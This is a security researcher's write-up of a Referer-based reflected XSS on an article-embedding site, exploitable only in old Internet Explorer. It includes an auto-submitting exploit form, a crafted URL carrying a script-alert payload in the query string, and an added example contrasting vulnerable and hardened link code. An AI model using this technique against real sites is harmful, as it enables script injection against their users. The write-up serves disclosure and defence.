Referer Based XSS
Jul 30, 2017
Severity: Medium
Complexity: High (exploitable only with old versions of IE)
Weakness: Using the Referer value in the response body
- While testing one of the private programs on HackerOne, I noticed that they have functionality to embed their users' articles on third-party sites.
- When opening an article from a third-party site, I noticed a link labelled "GO BACK! If it doesn't load".
- Checking the go back href:
<a href="http://54.147.92.2/test.html">go back</a>
and try again. If this problem persists, please
<a href="/contact">contact us</a>
- Exploit.html (the form must be parsed before the script runs, otherwise getElementById finds nothing):
<form id="xx" name="exploit" method="GET" action="https://site.com/articles/author/embed/112434/"></form>
<script>document.getElementById('xx').submit()</script>
- When we send http://54.147.92.2/exploit.html?<script>alert(1);</script> to the victim.
- The Referer value gets set to http://54.147.92.2/exploit.html?<script>alert(1);</script>, and after clicking on "GO BACK!" the popup appears in IE.
- The attack works only on IE because Internet Explorer does not URL-encode the query string it sends in the Referer header, whereas Chrome and Firefox send it URL-encoded as
http://54.147.92.2/exploit.html?%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
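As an added example (not code from the original post or from the program involved), here is a server-side "go back" link builder in Node showing the reflected-Referer bug beside a hardened version that only accepts same-origin http(s) referers and HTML-escapes the attribute. The site origin https://site.com and the sample Referer value are assumptions taken from the post's own URLs.

```javascript
// Added example, not code from the original post: a server-side "go back" link
// builder with the reflected-Referer bug beside a hardened version. Assumed
// (constructed): the app runs on Node, `referer` is the raw Referer header
// string, and the article site's own origin is https://site.com.

const SITE_ORIGIN = 'https://site.com'; // assumed origin of the article site
const FALLBACK = '/';                   // used whenever the Referer is unusable

// Vulnerable: the raw Referer is dropped straight into an href attribute.
// IE sent the query string unencoded, so "?<script>..." lands in the markup.
function goBackLinkVulnerable(referer) {
  return `<a href="${referer}">go back</a>`;
}

// Escape the five characters that matter in HTML text and attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: parse the Referer, accept only http(s) URLs on our own origin
// (so third-party referers and javascript: URLs are never used), and return
// the re-serialised URL, which percent-encodes < and > in the query.
function safeBackUrl(referer) {
  if (typeof referer !== 'string' || referer === '') return FALLBACK;
  let u;
  try {
    u = new URL(referer);
  } catch (e) {
    return FALLBACK; // not a parseable absolute URL
  }
  if (u.protocol !== 'https:' && u.protocol !== 'http:') return FALLBACK;
  if (u.origin !== SITE_ORIGIN) return FALLBACK;
  return u.href;
}

// Defence in depth: escape the attribute value even after validation.
function goBackLinkHardened(referer) {
  return `<a href="${escapeHtml(safeBackUrl(referer))}">go back</a>`;
}

// Constructed sample: the Referer the post says IE sent unencoded.
const IE_REFERER = 'http://54.147.92.2/exploit.html?<script>alert(1);</script>';

console.log(goBackLinkVulnerable(IE_REFERER)); // reflects the raw payload
console.log(goBackLinkHardened(IE_REFERER));   // <a href="/">go back</a>
```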
- I would like to thank the author of the following blog post: http://www.gremwell.com/exploiting_xss_in_referer_header
- They fixed it by using javascript:history.back():